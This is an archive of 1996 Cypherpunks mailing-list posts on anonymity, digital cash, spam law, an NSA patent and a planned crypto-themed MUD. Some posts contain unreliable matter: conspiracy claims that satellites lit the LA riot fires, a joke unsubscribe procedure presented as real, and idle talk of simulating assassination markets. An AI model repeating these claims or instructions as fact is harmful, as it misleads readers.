I use SHA to encrypt something for someone else to decrypt? I > know how to use it for authentication; am I missing something here? > > ANFSCD: > > I tried that OnNet32 e-mail software from FTP software. It runs under > Windows95. It is a lot of material to download, and way too intrusive to > install. It wants to metastasize itself into the innards of Microsoft > Exchange and Inboxes, etc. What is it with all this complexity anyway? > Why not just have a POP client that will check mail on the server? > > It also wants you to store your mailbox password in it, as opposed to > letting you enter it on a session-by-session basis. I don't like that. > > sticking with PINE, PGP, and Xywrite II for now.... > [This message may have been dictated with Dragon Dictate 2.01. Please be alert for unintentional word substitutions.] A. Michael Froomkin | +1 (305) 284-4285; +1 (305) 284-6506 (fax) Associate Professor of Law | U.. Miami School of Law | froomkin at law.miami.edu P.O. Box 248087 | http://www.law.miami.edu/~froomkin Coral Gables, FL 33124 USA | It's hot here. And #@&*! humid. From hallam at ai.mit.edu Sat Sep 7 18:16:03 1996 From: hallam at ai.mit.edu (Hallam-Baker) Date: Sun, 8 Sep 1996 09:16:03 +0800 Subject: Los Angeles Times article on Helsingius and anon.penet.fi In-Reply-To: <50fonn$mta@life.ai.mit.edu> Message-ID: <3231FB72.167E@ai.mit.edu> John Gilmore wrote: > PS: I would counsel against the kind of false anonymity provided by > the Finnish server, though. Providing information under the promise > that it will "never be revealed or misused" is a lot more dangerous > than never providing it at all. E.g. "Anonymous cash" that is really > based on dossiers or account-numbers isn't anonymous at all. Even > physical cash is getting easier to trace; the British government has > been tracking money by serial numbers for years, with custom machines > in the banks, to de-anonymize Irish freedom-fighters (oops, I mean > terrorists). Anonymity is another area, like privacy, where changes > from technology can make big social differences. There is a massive difference between anonymous speech and anonymous transactions. Anonymous speech can create problems (defamation etc.) but in the main these are not problems the courts are particularly good at dealing with. In the UK the libel laws are not so much a redress for legitimate grievance than a way for a senior Tory to obtain a nice lump sum towards his pension if he should happen to be filmed handing over 5000 quid in a breifcase to a prostitute he'd never met. The "problems" encountered by the Church of Scientology demonstrate that the court process itself can be imeasurably more harmfull than any imagined grievance. Should society have laws to protect trades secrets? Probably , but not to protect the likes of the CoS. If the Internet makes such laws difficult to enforce then we should return to the original concerns that prompted society to create the laws in the first place and see if the Internet provides better was of achieving the same result. Anonymous transactions are a rather different matter. It is more difficult to argue for anonymity. The extreeme examples of Chaumian cash create considerable difficulties such as making a perfect conduit for ransom proceeds and the profits of drug trafficing. Simply ignoring these problems will result in the proponents of anonymity simply being ignored. The principle fear of the authorities appears to be terrorist rather than normal criminal activities. Terrorism is no longer limited to far off irredentist struggles that ex-patriates can harbour romantic thoughts about. The reality the the IRA is an organisation that murders children by placing a bomb in a rubbish bin outside a MacDonalds has been brought home to the suporters of Noraid through the bombings of the World Trade Center, Oaklahoma and Atlanta. If one lives in a country where there is little terrorism it is easy to imagine that people driven to extreeme actions are driven by a extreeme situation. If one is faced with the reality of terrorism one soon reaches the conclusion that its perpetrators are simply ordinary psychopaths. Having stated that terrorism is an important concern for the state it is necessary to ask whether it is necessary to restrict freedom to combat terrorism. In answering one must bear in mind that a central part of most terrorist strategies is to force the state to respond with disproportionate measures (here recent events in Chetchnya indicate that Trotsky was not widely read in the USSR). Absolutely anonymous cash may create problems, but what if it were possible to generate small quantities of "marked bills" within an otherwise anonymous system. If the circumstances under which the marked bills could be distributed were limited to a small set of tightly controlled circumstances the legitimate need of the government to oppose terrorism and organised crime could be met without imposing a Singapore style system with total monitoring. In effect what is taking place is a negotiation between two groups, the government and civil rights activists. If one side refuses to consider the needs of the other they will be marginalised. Absolutism in politics is usually a bad thing. Politics usually works through compromises. The art being to ensure that one compromises the inessential terms in order to defend the key items. In the present Presidential race the one policy area in which Clinton is potentially vulnerable is privacy. Its the one area which the Republicans could raise and claim it as their own (whether justifiable or not). The Clinton camp could not move from their current position without dropping Freeh overboard, since Freeh has run the FBI without any Ruby ridge or Waco style cockups on his watch I don't think that is likely to happen. If privacy is raised as a policy concern in this election it will reoccur in the next and both parties will have to justify their policies in terms of personal privacy as well as everything else. Just because the election is practically settled does not mean that the campaign will not affect what happens during the administration. Clinton clearly wants Gore to be his successor and is going to want to make it as easy as possible for him to win. Clinton is the kind of politician I can trust - give him an issue and I trust him to look at the opinion polls. If Dole makes any kind of headway in '96 with a privacy plank then Gore will have to have one in 2000. Phill From raptrtrust at sigmais.com Sat Sep 7 18:18:08 1996 From: raptrtrust at sigmais.com (raptrtrust at sigmais.com) Date: Sun, 8 Sep 1996 09:18:08 +0800 Subject: No Subject Message-ID: <1.5.4.16.19960907184914.2e3f7388@sigmais.com> Hello. I would like to know more about cryptography. Please snd me any information that you have. Thank you, RaptrTrust From rwright at adnetsol.com Sat Sep 7 18:34:25 1996 From: rwright at adnetsol.com (Ross Wright) Date: Sun, 8 Sep 1996 09:34:25 +0800 Subject: /\/\/\/\/HELP\/\/\/\/\ !!!!!!!!! Message-ID: <199609072326.QAA14153@adnetsol.adnetsol.com> On Or About: 7 Sep 96 at 16:46, kickboxer wrote: > I really need help unsubscribing from the Cypherpunks list! it is imperative! > HA HA HA HA HA HA!! That's soooo funny!!! From frogfarm at yakko.cs.wmich.edu Sat Sep 7 18:53:14 1996 From: frogfarm at yakko.cs.wmich.edu (Damaged Justice) Date: Sun, 8 Sep 1996 09:53:14 +0800 Subject: Court challenge to AOL junk-mail blocks In-Reply-To: <1.5.4.32.19960907204437.0068b4d8@pop3.interramp.com> Message-ID: <199609072354.TAA28601@yakko.cs.wmich.edu> > >It seems as though the judge was snookered by the spammers' claim of U.S. > >Mail-like service, free speech, blah. The right to free speech does > >extend to corporations; in that way, it includes the right *not* to speak. > > Declan raises a good point. But I'm guessing it's a bit more complex than > that. CyberPromo and AOL lawyers tell me the court slapped down AOL simply > to "keep the status quo." Both sides used those very words, in fact. > > What's more, CyberPromo talks a good game on the First Amendment, but used > computer fraud and unfair competition statutes - not the Bill of Rights - in > its original filing against AOL. So what's going on? It may be because until the 14th amendment incorporated the BoR against the states, only individuals enjoyed its protections -- the Slaughterhouse cases extended the BoR to corporations. Or it may just be that CyberPromo knew they probably didn't have a leg to stand on when it came to the BoR, and decided to try a safer tack. > It seems Weiner is _very_ aware that this case deals with things never > before argued in court. No one has really sorted out just how much e-mail - > if any - an ISP is obligated to carry against its wishes. What Weiner > decides this fall may not set the kind of precendent that the case of the > Pentagon Papers did, but will be important for a while at least. Agreed. Regardless of the outcome, this is a case to watch. -- http://yakko.cs.wmich.edu/~frogfarm ...for the best in unapproved information Hey, Bill Clinton: You suck, and those boys died! I hope you die! I feel a groove comin' on $ Freedom...yeah, right. From jfricker at vertexgroup.com Sat Sep 7 20:17:44 1996 From: jfricker at vertexgroup.com (John F. Fricker) Date: Sun, 8 Sep 1996 11:17:44 +0800 Subject: What the NSA is patenting Message-ID: <2.2.32.19960908005316.00af91b4@vertexgroup.com> At 04:56 PM 9/7/96 -0500, you wrote: >John F. Fricker wrote: >> >> This excerpt from a Wired article/interview >> http://www.hotwired.com/wired/3.10/departments/electrosphere/data.html >> >> "No data is totally safe," says Sharp ... > >That entire article struck me as a load of hogwash the first time I >read it. This Sharp dude rehashed several old fairy tales about >data recovery. > Actually Sharp appears only in that one quote. The article is poorly editted. The rest of the article quotes some other data recovery experts and "Sharp" is never mentioned again. It's fun to debunk journalists but it takes more than saying "it's bunk". --j From jfricker at vertexgroup.com Sat Sep 7 20:41:10 1996 From: jfricker at vertexgroup.com (John F. Fricker) Date: Sun, 8 Sep 1996 11:41:10 +0800 Subject: Deleted Message Message-ID: <2.2.32.19960908012312.00b0b0b8@vertexgroup.com> I wonder what I said? At 08:41 PM 9/7/96 -24000, you wrote: >To: >From: MQG-SMTP3 at USMC_MASTERINET@Servers[] >Subject: Re: Mail OnNet > Message in Transport deleted by: > ADMINISTRATOR at USMC_MASTERINET@Servers > > From doom13 at juno.com Sat Sep 7 20:44:16 1996 From: doom13 at juno.com (Floyd W Odom) Date: Sun, 8 Sep 1996 11:44:16 +0800 Subject: talker Message-ID: <19960907.200300.3174.0.Doom13@juno.com> Dear Whoever, I am doom13. If there is anyone out there who is a hacker or would like to be one you can talk to me and find out stuff like cracking. Just drop a message at doom13 at juno.com. Doom13 From dthorn at gte.net Sat Sep 7 21:13:08 1996 From: dthorn at gte.net (Dale Thorn) Date: Sun, 8 Sep 1996 12:13:08 +0800 Subject: TWA 800 - Friendly Fire? Message-ID: <323227A1.C1B@gte.net> wrote: > The one thing I have been thinking about, since the very beginning, is > am I the only person who feels this might have been somewhat less than > unintentional? It sure would be easy to take those rights away if > everyone is afraid for their "lives"... > Look at what has been happening in the news lately, and look at how > much is "unexplained" or flimsy evidencially speaking, in the very > least. > If, for instance, the government wanted to cut down on civil > liberties/civil rights, it would seem MIGHTY CONVENIENT that so much > is "accidentally" happening so close together. > Ditto with the Olympics thing. > I vote something is QUITE fishy, and I guess I hope I'm not the only > one paranoid enough to feel the same. Sure something's fishy. Look at the technological capabilities they have, and we're not keeping up with them. One example: L.A. riots, 1992. 6,500 or so fires, unknown arsonist(s). But very convenient for clearing certain properties if you're putting in a new freeway or subway tunnel, and you don't want to have to fight with all the riffraff who might be resistant to getting up and moving. So how do you light all those fires? Do it the hard way - plant the stuff (6,000-plus times!) and hope nobody catches your guys, or light 'em up from satellites, using "new experimental" focused energy. Gosh, Mr. Bill, would they do that? Guess it depends on what you're willing to believe. Remember what Tom Wolfe wrote about? "The reason the folks on the East Coast (circa 1700's) were such easy victims for the pirates was the fact that they couldn't comprehend just how vicious and ruthless the pirates really were." (quote approximate). From enzo at ima.com Sat Sep 7 21:40:15 1996 From: enzo at ima.com (Enzo Michelangeli) Date: Sun, 8 Sep 1996 12:40:15 +0800 Subject: Los Angeles Times article on Helsingius and anon.penet.fi In-Reply-To: <3231FB72.167E@ai.mit.edu> Message-ID: On Sat, 7 Sep 1996, Hallam-Baker wrote: > There is a massive difference between anonymous speech and anonymous > transactions. Anonymous speech can create problems (defamation etc.) > but in the main these are not problems the courts are particularly > good at dealing with. Perhaps, but defamation is an issue that can't be ignored either, especially if one tries to build systems based on reputation. Enzo From perry at piermont.com Sat Sep 7 21:55:56 1996 From: perry at piermont.com (Perry E. Metzger) Date: Sun, 8 Sep 1996 12:55:56 +0800 Subject: /\/\/\/\/HELP\/\/\/\/\ !!!!!!!!! In-Reply-To: <199609072146.QAA16610@netnet1.netnet.net> Message-ID: <199609080247.WAA19662@jekyll.piermont.com> kickboxer writes: > I really need help unsubscribing from the Cypherpunks list! it is imperative! God helps those who help themselves. From attila at primenet.com Sat Sep 7 22:21:23 1996 From: attila at primenet.com (attila) Date: Sun, 8 Sep 1996 13:21:23 +0800 Subject: talker In-Reply-To: <19960907.200300.3174.0.Doom13@juno.com> Message-ID: <199609080305.VAA14256@InfoWest.COM> In <19960907.200300.3174.0.Doom13 at juno.com>, on 09/07/96 at 09:52 PM, doom13 at juno.com (Floyd W Odom) said: =Dear Whoever, = I am doom13. If there is anyone out there who is a hacker or would =like to be one you can talk to me and find out stuff like cracking. =Just drop a message at doom13 at juno.com. =Doom13 aw... come on, guy. in 25 years of the net, I've seen more than a few go down and these are generally not so blatant. up until 15 years ago when some 'strike panic in their hearts' bleeding pansy Wall Street Journal liberal journalist confused hacking with cracking, "hacker" had been a *badge of honor* hacking was a term used among profesionals to define someone much more than a programmer, or as one of the definitions put it: programmers program code, hackers tweak code. so, take your trolling hooks back to your government leash; go out and have some legitimate fun at your tender young age. cypherpunks are *not* crackers; this is a crytographic and political issues relating to cryptography mailing list. join one of the usenet groups such as alt.hacker or 2600 if you want that kind of action. have a good day! -- one of the few things we all share: the utter, corrosive contempt for our elected officials. From jleonard at divcom.umop-ap.com Sat Sep 7 22:32:21 1996 From: jleonard at divcom.umop-ap.com (Jon Leonard) Date: Sun, 8 Sep 1996 13:32:21 +0800 Subject: MUD anyone? In-Reply-To: Message-ID: <9609080251.AA22510@divcom.umop-ap.com> Mark Grant wrote: > On Tue, 27 Aug 1996, Jon Leonard wrote: > > > I've been planning to run a MUD like that, at mud.umop-ap.com port 2121. > > I just don't have enough coded to be worth announcing yet. > > Cool. What's it running under? I was planning to base it around the latest > version of the Nightmare library for MudOS, which I just downloaded. If I > can get a copy somehow I could start hacking on it. I've written the server from scratch, and don't have much of a mudlib at this point. The language is lisp-ish, although I'm planning to write a parser for a c-like syntax. It's properly tail-recursive, has explicit continuations, and has associative arrays as a native datatype. It's probably easiest for me to create an account on umop-ap.com for anyone interested in collaborating with me. If the consensus is that starting with an existing MUD is easier, that's fine too. > > Pseudonyms > > Anonymous digital cash (issued by any pseudonym, not just "banks") > > Public and private keys > > Secret sharing > > Anonymous broadcast & message pools > > Anonymous markets > > All sounds like good stuff to me... DC Nets as well, of course. I guess we > should also simulate the Net somehow, with Web servers, email, etc. Are DC-nets useful for anything besides anonymous broadcast? I'd probably cheat on implementation unless there is some other property that I'm missing. For network-related stuff, I've been considering a fantasy setting, but one that allows for "magical" instantaneous long-distance communication between any two objects. Web servers wind up being persistent spells, email is really easy, and so on. > Though the Nightmare library apparently lets you create Mud objects which > can access the Web so perhaps we can use the real one somehow (with the > obvious security implications). I'm reluctant to involve the outside world in a MUD except as a source of players. This is partially due to security and extra programming complexity, but mostly because I'd want to isolate the game from the pressures that being a remailer or anonymizer brings. > What else? > > Protection Agencies > Escrow Agencies > Private Law Courts (probably controlled by players rather than the > computer) > Reputation Agencies With the possible exception of Escrow, I'd make these player functions rather than server functions. They are important, of course. There are a number of things in "Applied Cryptography" that I missed, significantly: Timestamping Subliminal channels Secure multiparty Computation Blind signatures Oblivous Transfer > > What am I missing? Should there be direct support for Jim Bell's > > assasination markets? It'd provide a means of demonstrating its > > ineffectiveness as a means of social control. > > I think it should be incorporated, but I think that people can set them up > easily themselves. Perhaps we should have an NPC-run 'Assasins Inc' which > would run the lottery, and then players could do the actual 'wet work'. It could be PC-run, too. Then again, how can you tell the difference? > But yes, I'd really like to see how this would work in the game. As I > said I'm thinking of this more as a semi-scientific experiment than a > pure game. We have some idea of how this stuff should work in theory, but > little of how it works in practice. I'm still primarily looking at the game aspect. After all, if it isn't an interesting game, then there won't be enough players to get meaningful results. We need real humans making the various economic decisions in order to reduce the consequences of programmer bias. Also, there's the teaching possibility. Where a simulation would only appeal to those who are already of a libertarian bent, a working anarchic MUD might reach others. > I do think though that we'd have to enforce some kind of rule against > 'disposable characters', otherwise people could simply create a new > character every time they were killed trying to assasinate someone. There > would need to be some disadvantage to just going in guns-blazing and being > killed ten times in a row. If a new character is significatly weaker than an experienced character, then this may not be a problem. They simply wouldn't have enough of a chance against a real target to be more than an annoyance. Alternately, having the game prevent new characters from starting fights with other players stops this quite quickly. That's what we did on the LPmud I ran. I'd prefer that the only rules be against trying to bring down the server, though. What's the point of an anarchy with rules? For the general problem of making player death costly, I'd been planning on having some abilities reside in a "soul" and some in the "body". If a body dies, that's it for that body. The player has to start over with a new, untrained, body. This can be a problem if, for example, the soul's main fighting skill is with a weapon that the body isn't yet strong enough to lift. > > I think that for purposes of simulation, it's reasonable to model > > cryptographic primitives in a "Trust the server" mode, because you > > need to trust the MUD server anyway (unlike a government), and it > > puts a much lower load on the CPU. > > Yep, I agree. I would like to include the real protocols but it's going to > be far too slow. So we could create, say, remailer objects, anonymous > digital cash objects, etc. As long as they have the same properties in > 'SimAnarchy' as they would in real life then the actual behind the scene > mechanics don't matter. We could, perhaps, allow characters to break > protocols if they could accumulate enough processing power. Since real-world stuff is apparently nearly immune to brute force, I'd go all the way and make the game stuff truly immune. Breakability is a feature that just isn't worth the effort to code, especially since we're interested in the consequences of unbreakable crypto. > I don't know how low a level we'd want to go to. I think that having an > explicit group of remailers (and 'IP rerouters') would be a good idea as > it would allow people to try to crack messages and perform traffic analysis. > Some remailers could be run by NPCs (some of whom would be trustworthy and > some wouldn't), others by the players themselves (with or without logging > enabled). I could go either with that, or a net that really is secure and unsnoopable. > I'd like to also include some way by which players could write 'software' > even if they weren't able to create new objects for the game. So they could > perhaps write front-ends for remailers and give them away or sell them to > other players. The obvious analogue to software in a fantasy setting is spells. This requries security of the server from arbitrary player code, but that's been one of my design goals for some time. > > There's also the question of log policy. Having run a MUD for a few > > years, I want to keep logs for bug detection. A declared policy that > > they aren't released for n years would work though. Opinions, anyone? > > Part of me thinks that we should explicitly state that anything may be > logged and used in sociological research. Perhaps we could create some > kind of secure protocol to allow users to connect without revealing their > real identities, so that it wouldn't matter if they were logged? A general disclaimer that anything can be logged is almost mandatory. Logs are too useful for debugging. Still, I'd prefer to periodically trim the logs so that no one can meaningfully demand them. Besides, writings from a player perspective are probably better anyway. Now that I think about it, having a character (player or non) who acts as a historian and news service would be good anyway. As for logging without real identities, that's not enough -- pseudonyms can be recognized and outed by textual analysis. A certain amount of caution is always necessary if you're doing something that you wouldn't want made public, but I don't want the MUD to require any more than that fundamental minimum. > Anyone want to set up a mailing list for this discussion? How about mud at umop-ap.com? I'm currently the only subscriber, but that can be fixed. > Mark Jon From gbroiles at netbox.com Sat Sep 7 22:36:44 1996 From: gbroiles at netbox.com (Greg Broiles) Date: Sun, 8 Sep 1996 13:36:44 +0800 Subject: Los Angeles Times article on Helsingius and anon.penet.fi Message-ID: <2.2.32.19960908032421.007004c0@mail.io.com> >The principle fear of the authorities appears to be terrorist rather >than normal criminal activities. Either that, or the fear that authorities are no longer necessary unless they can point to something dangerous that they're protecting the rest of us from - with the plausibility of the Godless Communist Threat waning, it becomes necessary for drug sellers and people with fringe politics to appear more threatening. Support (political and financial) for the exercise of power is a function of the anxiety level of the populace. People whose income and sense of self-worth is derived from that exercise of power have a clear interest in maintaining or increasing the level of anxiety. Do you imagine a future in which law enforcement holds a press conference to announce "We're mostly eating donuts and reading magazines. There's not much for us to do. Perhaps half of us should be laid off or something."? Can you imagine the military spontaneously downsizing, or failing to oppose reductions in force? >Terrorism is no longer limited to far >off irredentist struggles that ex-patriates can harbour romantic >thoughts about. The reality the the IRA is an organisation that murders >children by placing a bomb in a rubbish bin outside a MacDonalds has >been brought home to the suporters of Noraid through the bombings of the >World Trade Center, Oaklahoma and Atlanta. While domestic terrorist events may bring a sharper focus to discussions of the merits and costs of politically motivated violence, your fantasy that it will somehow bring about a change in someone's substantive politics is amusing. It seems at least as likely that domestic repression purportedly adopted in "response" to recent events will create a feeling of solidarity with people living under Orwellian governments. ("Of course those guys over there are blowing things up. Their government sucks. Hey, our government is starting to suck. Let's blow some stuff up.") Further, your notion that "terrorism" has somehow been limited to "far-off irredentist struggles" of concern only to expatriates is ridiculous. Have you not noticed the arson, bombings, and shootings at abortion clinics in the US? Or the history of violence on the (neo-) left, e.g., the Weather Underground, etc.? Or the history of the KKK and race-motivated lynchings/beatings? Or the Unabomber? >If one lives in a country >where there is little terrorism it is easy to imagine that people driven >to extreeme actions are driven by a extreeme situation. If one is faced >with the reality of terrorism one soon reaches the conclusion that its >perpetrators are simply ordinary psychopaths. Isn't it wonderful that "one" unavoidably "reaches conclusions" which eliminate moral and political arguments you find uninteresting? We might as well announce that "One soon learns that repression will never eliminate violent opposition" or some other arguable proposition. Deciding that every person who supports or engages in politically motivated violence is an "ordinary psychopath" suggests that many, many people are psychopaths; and that makes the diagnosis of "psychopath" unremarkable. Was that really your point? >Having stated that terrorism is an important concern for the state it is >necessary to ask whether it is necessary to restrict freedom to combat >terrorism. In answering one must bear in mind that a central part of >most terrorist strategies is to force the state to respond with >disproportionate measures (here recent events in Chetchnya indicate that >Trotsky was not widely read in the USSR). Or perhaps "it is necessary to ask" whether restricting pre-existing freedom has ever reduced or eliminated "terrorism"; it's certainly worked well in Lebanon and the Palestine, in Germany, Japan, and Peru .. or has it? (But as counterexamples, we've got the Soviet Union under Stalin, Germany under Hitler, Italy under Mussolini, Chile under Pinochet, Cuba under Castro, Nicaragua in the mid-80's, and China. Perhaps you're right.) >Absolutely anonymous cash may create problems, but what if it were >possible to generate small quantities of "marked bills" within an >otherwise anonymous system. If the circumstances under which the marked >bills could be distributed were limited to a small set of tightly >controlled circumstances the legitimate need of the government to oppose >terrorism and organised crime could be met without imposing a Singapore >style system with total monitoring. Boy, if we could just figure out the right combination of procedural rules, we could simply abandon all of this problematic "rights" stuff. Wouldn't that be a lot simpler? These pesky "rights" keep getting in the way of legitimate government needs. Shit. >In effect what is taking place is a negotiation between two groups, the >government and civil rights activists. If one side refuses to consider >the needs of the other they will be marginalised. Absolutism in politics >is usually a bad thing. Politics usually works through compromises. The >art being to ensure that one compromises the inessential terms in order >to defend the key items. Don't forget that it's necessary to adopt an exaggerated version of your own position, such that you can "compromise" your way to "agreeing" on exactly what you wanted in the first place. It's also useful to categorize your opponent's position as "extreme", "radical", "unworkable", "unrealistic", or "militant" - such that they cannot continue to maintain it and remain "reasonable". (e.g., "extreeme [sic] examples of Chaumian cash") In effect what is taking place is a negotiation between two groups, the government and civil rights activists. The government is asking us if we'd rather be shot in the right kneecap or the left kneecap to ensure that we don't try to run from the legitimate needs of the government. If the civil rights groups don't get on the bandwagon and pick a kneecap, they'll lose any chance they had to have an influence over this crucial process of self-government. Would you like one lump, or two? >If privacy is raised as a policy concern in this >election it will reoccur in the next and both parties will have to >justify their policies in terms of personal privacy as well as >everything else. Not if "privacy" is considered something suspicious which only extremist militant pro-pedophile terrorists would be interested in. After all, every reasonable person is open to compromising in order to accommodate the state's legitimate interest in preventing bad things from happening, right? And if a little repression and loss of privacy doesn't seem to improve things, we'd better just have some more, hmm? Never can get too much of that compromise stuff. -- Greg Broiles |"Post-rotational nystagmus was the subject of gbroiles at netbox.com |an in-court demonstration by the People http://www.io.com/~gbroiles |wherein Sgt Page was spun around by Sgt |Studdard." People v. Quinn 580 NYS2d 818,825. From pgut001 at cs.auckland.ac.nz Sat Sep 7 22:37:57 1996 From: pgut001 at cs.auckland.ac.nz (pgut001 at cs.auckland.ac.nz) Date: Sun, 8 Sep 1996 13:37:57 +0800 Subject: What the NSA is patenting Message-ID: <84215235509971@cs26.cs.auckland.ac.nz> >>>United States Patent Patent Number: 5264794 >>> Date of Patent: 23 Nov 1993 >>> >>>Method of measuring magnetic fields on magnetically recorded media using a >>>scanning tunneling microscope and magnetic probe >>techology isn't much different from what's publicly available), in this case >>all they were doing was protecting their investment (just like the various PKC >>patents originally assigned to universities). >I'm sure there's going to be a REALLY marketable device out of this to get >royalties off of. No, the market for the more mainstream MFM's is small (a few K devices), for MFSTM's it's even smaller (a few dozen?). MFSTM's are usually built by universities for research purposes, which means the patent won't affect them. As I said before, it's purely a "we paid for the research, we want some paper to wave around to justify the cost" thing. >Question: if we pay taxes, then we pay for the research. if we pay for the >research, we should be able to see the results, just like shareholders in a >company. You can see the results, just read the Journal of Applied Physics or IEEE Transactions on Magnetics. I know people like to come up with conspiracy theories about the NSA, but this patent won't work as the basis for one. Peter. From perry at piermont.com Sat Sep 7 22:49:02 1996 From: perry at piermont.com (Perry E. Metzger) Date: Sun, 8 Sep 1996 13:49:02 +0800 Subject: talker In-Reply-To: <19960907.200300.3174.0.Doom13@juno.com> Message-ID: <199609080340.XAA19752@jekyll.piermont.com> Floyd W Odom writes: > I am doom13. If there is anyone out there who is a hacker or > would like to be one you can talk to me and find out stuff like cracking. > Just drop a message at doom13 at juno.com. Are you the same jerk who was posting a week ago? From accessnt at ozemail.com.au Sat Sep 7 22:56:38 1996 From: accessnt at ozemail.com.au (Mark Neely) Date: Sun, 8 Sep 1996 13:56:38 +0800 Subject: TWA 800 - Friendly Fire? Message-ID: <2.2.32.19960908041522.006d97d8@ozemail.com.au> >Look at what has been happening in the news lately -- and look at how >much is "unexplained" or flimsy evidencially speaking, in the very least. >If, for instance, the government wanted to cut down on civil >liberties/civil rights, it would seem MIGHTY CONVENIENT that so much is >"accidentally" happening so close together. >-Millie >sfuze at tiac.net Yes, I wonder if the WhiteHouse will rush through a bill overturning the anti-terrorist measures which they justified on the basis of the TWA bombing. Regards, Mark ___ Mark Neely - accessnt at ozemail.com.au Lawyer, Internet Consultant, Professional Cynic Author: Australian Beginner's Guide to the Internet (2nd Ed.) Australian Business Guide to the Internet Internet Guide for Teachers, Students & Parents Check out my Anti-SPAM FAQ: http://www.accessnt.com.au/faqs/spam.htm From jfricker at vertexgroup.com Sat Sep 7 22:59:17 1996 From: jfricker at vertexgroup.com (John F. Fricker) Date: Sun, 8 Sep 1996 13:59:17 +0800 Subject: [PARANOID NOISE]Re: TWA 800 - Friendly Fire? Message-ID: <2.2.32.19960908035047.00aff470@vertexgroup.com> At 06:55 PM 9/7/96 -0700, you wrote: > wrote: >> The one thing I have been thinking about, since the very beginning, is >> am I the only person who feels this might have been somewhat less than >> unintentional? It sure would be easy to take those rights away if >> everyone is afraid for their "lives"... >> Look at what has been happening in the news lately, and look at how >> much is "unexplained" or flimsy evidencially speaking, in the very >> least. >> If, for instance, the government wanted to cut down on civil >> liberties/civil rights, it would seem MIGHTY CONVENIENT that so much >> is "accidentally" happening so close together. >> Ditto with the Olympics thing. >> I vote something is QUITE fishy, and I guess I hope I'm not the only >> one paranoid enough to feel the same. > >Sure something's fishy. Look at the technological capabilities they >have, and we're not keeping up with them. One example: > >L.A. riots, 1992. 6,500 or so fires, unknown arsonist(s). But very >convenient for clearing certain properties if you're putting in a new >freeway or subway tunnel, and you don't want to have to fight with all >the riffraff who might be resistant to getting up and moving. > >So how do you light all those fires? Do it the hard way - plant the >stuff (6,000-plus times!) and hope nobody catches your guys, or light >'em up from satellites, using "new experimental" focused energy. Gosh, >Mr. Bill, would they do that? Guess it depends on what you're willing to >believe. Remember what Tom Wolfe wrote about? "The reason the folks on >the East Coast (circa 1700's) were such easy victims for the pirates was >the fact that they couldn't comprehend just how vicious and ruthless the >pirates really were." (quote approximate). > > For some reason I find seeing satellites flying in formation rather disturbing. The classic 3-4-5 right triangle makes somebody's math easier, I'm sure. I have watched the sky for 20 years and seeing that pattern glide across the sky made we wonder just what the shuttle is doing up there. How many satellites have been placed in orbit? How precise are their positions? --j From attila at primenet.com Sat Sep 7 23:05:13 1996 From: attila at primenet.com (attila) Date: Sun, 8 Sep 1996 14:05:13 +0800 Subject: take the pledge Message-ID: <199609080352.VAA15611@InfoWest.COM> Alright! it's a genuine PerryGram! I'll take the pledge; I've never been able to answer Sternlight without being significantly more offensive than usual! attila -- one of the few things we all share: the utter, corrosive contempt for our elected officials. -------------------------------------------------------- In, on 07/19/96 at 12:06 PM, "Perry E. Metzger" said: =Subject: take the pledge =Look, folks, we all know that 99% of what David Sternlight posts is =garbage. Why don't we all pledge not to answer any of his posts, and =then he'll go away. If necessary, someone can be appointed to post a =weekly "the views expressed by David are junk and we are deliberately =not replying to them directly" message. =David has plenty of places to argue with the wind. We don't need to =add this one. =I'd like to ask people to publically pledge that they will not reply =to David's messages. This is such a pledge. =Perry From paul at fatmans.demon.co.uk Sat Sep 7 23:26:49 1996 From: paul at fatmans.demon.co.uk (paul at fatmans.demon.co.uk) Date: Sun, 8 Sep 1996 14:26:49 +0800 Subject: /\/\/\/\/HELP\/\/\/\/\ !!!!!!!!! Message-ID: <842145895.372.0@fatmans.demon.co.uk> > I really need help unsubscribing from the Cypherpunks list! it is imperative! > It is Imperrative that you do the following to ubsubscibe umself luddite. Get 3 other friends to send in messages to majordomo at toad.com with the line subscribe cypherpunks (their email address here) in the message then once they have subscribed send a message to cypherpunks at eff.org with the following in it: Authorise: (email 1) (email 2) (email 3) END replacing (email x) with their email addresses. then send a message to majordomo at toad.com with the line: unsubscribe cypherpunks (your email) and you will be taken off the 3 friends email addresses act as a security protocol to ensure you cannot be maliciously removed by someone else.. they will then have to repeat the exercise with 3 friends each of their own to unsubscribe themselves and so on down the chain... good luck. Datacomms Technologies web authoring and data security Paul Bradley, Paul at fatmans.demon.co.uk Http://www.fatmans.demon.co.uk/crypt/ "Don`t forget to mount a scratch monkey" -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6 mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53 6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3 sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az4= =riHc -----END PGP PUBLIC KEY BLOCK----- From gimonca at skypoint.com Sat Sep 7 23:47:06 1996 From: gimonca at skypoint.com (Charles Gimon) Date: Sun, 8 Sep 1996 14:47:06 +0800 Subject: Another Namespace Collision Message-ID: http://www.blacknet.cz *********************************************************************** Wild new Ubik salad dressing, not | gimonca at skypoint.com Italian, not French, but an entirely | Minneapolis MN USA new and different taste treat that's | http://www.skypoint.com/~gimonca waking up the world! | A lean, mean meme machine. *********************************************************************** From varange at crl.com Sat Sep 7 23:50:28 1996 From: varange at crl.com (Troy Varange) Date: Sun, 8 Sep 1996 14:50:28 +0800 Subject: What the NSA is patenting In-Reply-To: <199609071627.JAA01473@mail.pacifier.com> Message-ID: <199609080449.AA28514@crl11.crl.com> Burning the floppy would seem to solve the problem. Lock sensitive data in RAM away from disks except for burnable floppies. I guess linux can be configured to keep sensitive data in a RAM filesystem, keeping it from being synced or flushed. From Adamsc at io-online.com Sat Sep 7 23:52:19 1996 From: Adamsc at io-online.com (Adamsc) Date: Sun, 8 Sep 1996 14:52:19 +0800 Subject: talker Message-ID: <19960908045041953.AAA106@IO-ONLINE.COM> On Sat, 07 Sep 1996 21:52:25 EDT, Floyd W Odom wrote: > I am doom13. If there is anyone out there who is a hacker or >would like to be one you can talk to me and find out stuff like cracking. >Just drop a message at doom13 at juno.com. Hmmmm... Want to bet our other friend at juno.com sent him? I might just end up killfiling juno.com... Obviously a low-IQ area of the net. - "'Anonymity is bad,' says a source who wishes to remain anonymous." - Nuff' said. * Home: 